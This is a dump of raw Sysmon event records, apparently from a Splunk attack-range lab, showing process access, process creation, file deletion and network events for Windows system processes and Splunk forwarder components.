10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-132B-6216-8C04-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.208{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-132B-6216-8C04-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.209{4F8D34B0-132B-6216-8C04-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:47.130{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8271BF5B4C84AAA55CFF7E8B5A706073,SHA256=632A9528925B438D4DB62B151B9EE26E2CBB5ED1D7845B6456BFC6D8D6C73E6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:45.593{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51423-false10.0.1.12-8089- 23542300x8000000000000000217891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:48.396{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CBCD44A8A587904111D785EFBEF36EB,SHA256=4BAE0B6B193D370A7D9419F16CF401AE2B01D3A5B37B68FB133FA1DBDD4D8EF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:48.396{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9DB1AC6FA6883EC4E2B43F143945A7BC,SHA256=04DA7D596E462B452806E4817D9B949EBB6553D58623443E1CE1F554B49D3075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293358Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:48.134{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48A4B116BB8F3C89FE1D5B73011DCBD0,SHA256=9F019026714910E25673762E1A3F09C9A50F331A10D015985A96002B447CC01D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217889Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:48.115{4F8D34B0-132B-6216-8D04-000000003902}1036508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217920Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-132D-6216-8F04-000000003902}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217919Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217918Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217917Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217916Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217915Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217914Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217913Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-132D-6216-8F04-000000003902}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.880{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-132D-6216-8F04-000000003902}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.881{4F8D34B0-132D-6216-8F04-000000003902}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.615{4F8D34B0-132D-6216-8E04-000000003902}2241068C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:49.427{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DCCC44E00C2D6C57E30AFF5EB9F7936,SHA256=6C5D5A5D14E98E210439B53898B87A40C7639E57BF4D9A7959668A743FC685CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293360Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:49.857{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=133136E1EEAB19AE5BBAD8348D5EA051,SHA256=095F0A7140B33DA80608C05214BB66AC25F280EDC765A4C72ECCC9EB00EBA008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293359Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:49.140{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 